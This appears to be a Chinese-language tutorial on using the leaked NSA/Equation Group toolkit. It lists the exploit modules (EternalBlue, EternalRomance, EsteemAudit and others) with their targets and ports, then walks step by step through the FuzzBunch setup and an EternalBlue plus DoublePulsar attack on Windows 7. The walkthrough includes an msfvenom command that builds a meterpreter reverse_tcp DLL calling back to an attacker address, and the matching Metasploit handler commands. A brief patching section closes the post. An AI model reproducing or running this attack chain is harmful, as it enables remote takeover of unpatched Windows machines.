方程式EQGRP_Lost_in_Translation工具利用方法

北京时间4月14号晚，TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group（为NSA提供服务专门对国外进行间谍活动的组织）的黑客工具包。有网友在github上传了相关的解密后的文件，通过简单的分析所有的解密后的文件，发现其中包括新的23个黑客工具。具体请考：https://github.com/misterch0c/shadowbroker/blob/master/file-listing

这些黑客工具被命名为OddJob，EasyBee，EternalRomance，Eternalchampion，FuzzBunch，EducatedScholar，EskimoRoll，EclipsedWing，EsteemAudit，EnglishMansDentist，MofConfig，ErraticGopher，EmphasisMine，EmeraldThread，EternalSynergy，EwokFrenzy，ZippyBeer，ExplodingCan，DoublePulsar等

　　Start.jar //图形界面

　　ExplodingCan 是 IIS 6.0 远程漏洞利用工具
　　EternalRomance 是 SMB1 的重量级利用，可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。
　　ErraticGopher 、Eternalblue 、Eternalsynergy 、Eternalchampion 、Educatedscholar、 Emeraldthread 等都是 SMB 漏洞利用程序，可以攻击开放了 445 端口的 Windows 机器。
　　Esteemaudit 是 RDP 服务的远程漏洞利用工具，可以攻击开放了3389 端口的 Windows 机器。
　　Eclipsedwing 是 Windows 服务器的远程漏洞利用工具。
　　Eskimoroll 是 Kerberos 的漏洞利用攻击，可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。
　　FuzzBunch 是一个类似 MetaSploit 的漏洞利用平台。
　　OddJob 是无法被杀毒软件检测的 Rootkit 利用工具。

模块	漏洞	影响系统	默认端口
ExplodingCan	IIS6.0远程利用漏洞	Windows Server 2003	80
EternalRomance	SMBv1漏洞(MS17-010)和 NBT漏洞	Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2	139/445
ErraticGopher	RPC漏洞	Windows XP SP3, Windows 2003	445
Eternalblue	SMBv2漏洞(MS17-010)	Windows XP(32),Windows Server 2008 R2(32/64),Windows 7(32/64)	139/445
Eternalsynergy	SMB和NBT漏洞	Windows 8, Windows Server 2012	139/445
Eternalchampion	SMB和NBT漏洞	Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2, 2012, Windows 8 SP0	139/445
Educatedscholar	MS09-050漏洞	Windows vista, 2008	445
Emeraldthread	SMB和NBT漏洞	Windows XP, 2003	139/445
Esteemaudit	RDP漏洞	Windows XP, Windows Server 2003	3389
Eclipsedwing	MS08-067漏洞	Windows 2000, XP, 2003	139/445
Eskimoroll	kerberos漏洞	Windows 2000, 2003, 2003 R2, 2008, 2008 R2	88
Doublepulsar	SMB和NBT漏洞	Windows XP(32), Vista, 7, Windows Server 2003, 2008, 2008 R2	139/445
Zippybeer	SMTP漏洞		445
Englishmansdentist	SMTP漏洞		25
Ewokfrenzy	IMAP漏洞	IBM Lotus Domino 6.5.4, 7.0.2	143
Emphasismine	IMAP漏洞	IBM Lotus Domino 6.5.4, 6.5.5, 7.0, 8.0, 8.5	143
Easypi	IBM Lotus Notes漏洞	Windows NT, 2000 ,XP, 2003	3264
Easybee	MDaemon WorldClient电子邮件服务器漏洞	WorldClient 9.5, 9.6, 10.0, 10.1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

安装部署

• 下载 python2.6 并安装，注意，必须安装32位python2.6相关版本，其他版本不奏效。
• 下载 pywin32 并安装
• 将 C:\Python26 添加到环境变量 PATH 中。将windows\lib\x86-Windows | x64-Windows  加入到系统环境变量
• 将 EQGRP_Lost_in_Translation 下载到的文件解压，找到 \ windows\fb.py，将，下图中两个部分注释掉。

然后运行 python fb.py 就可以执行了。

NSA 漏洞利用框架视频过程:

链接: http://pan.baidu.com/s/1hszHQk8 密码: jqi9

可以用msf生成shellcode，payload那里执行run shellcode就可以反弹。成功反弹截图

拿到exp，测了下
所需环境如下：一，攻击机1(32位系统，py2.6版本，pywin32) 二，攻击机2（linux带msf就好）
windows目录下新建listeningposts目录，空的就好（是exp下的windows目录，不是C盘下的windows目录）
不需要注释文件
执行python fb.py
可看到如下页面

利用步骤

在靶机1（192.168.71.133）中安装好python、pywin32以及NSA工具，在

C:\shadowbroker-master\windows 中执行fb.py：

分别设置攻击IP地址192.168.199.107，回调地址192.168.71.133（攻击机1），关闭重定向，设置日志路径，新建或选择一个project：

接下来输入命令：

useETERNALBLUE

依次填入相关参数，超时时间等默认参数可以直接回车：

由于靶机是win7 系统，在目标系统信息处选择1：win72k8r2

模式选1：FB

确认信息，执行

成功后，接着运行use Doublepulsar：

并依次填入参数，注意在function处选择2，rundll

同时在攻击机2 kali的msfvenom 生成攻击dll：

msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

接着执行：

$ msfconsole

msf > useexploit/multi/handler

msf > set LHOST192.168.71.130

msf > set LPORT 5555

msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp

msf > exploit

同时将生成的go.dll上传到攻击机1（192.168.71.133），回到攻击机1，填入攻击dll路径：

接下来一路回车，执行攻击

回到kali，获得shell，攻击成功：

修复方案

1.临时规避措施：关闭135、137、139、445，3389端口开放到外网。推荐使用安全组策略禁止135.137.139.445端口；3389端口限制只允许特定IP访问。

2.及时到微软官网下载补丁升级,微软官方公告连接：

https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

微软已经发出通告 ，强烈建议用户更新最新补丁：

MS17-010 ： 严重 - Microsoft Windows SMB 服务器安全更新 (4013389)

https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

MS14-068 ：严重 - Kerberos 漏洞可能允许特权提升 (3011780)

https://technet.microsoft.com/library/security/MS14-068

MS10-061：严重 - 打印后台程序服务中的漏洞可能允许远程执行代码

https://technet.microsoft.com/library/security/ms10-061

MS09-050 ：严重 - SMBv2 中的漏洞可能允许远程执行代码 (975517)

https://technet.microsoft.com/library/security/ms09-050

MS08-067 ：严重 - 服务器服务中的漏洞可能允许远程执行代码 (958644)

https://technet.microsoft.com/library/security/ms08-067

 

 

TRANSLATE with x

English

Arabic	Hebrew	Polish
Bulgarian	Hindi	Portuguese
Catalan	Hmong Daw	Romanian
Chinese Simplified	Hungarian	Russian
Chinese Traditional	Indonesian	Slovak
Czech	Italian	Slovenian
Danish	Japanese	Spanish
Dutch	Klingon	Swedish
English	Korean	Thai
Estonian	Latvian	Turkish
Finnish	Lithuanian	Ukrainian
French	Malay	Urdu
German	Maltese	Vietnamese
Greek	Norwegian	Welsh
Haitian Creole	Persian

 

TRANSLATE with

COPY THE URL BELOW

Back

EMBED THE SNIPPET BELOW IN YOUR SITE

Enable collaborative features and customize widget: Bing Webmaster Portal

Back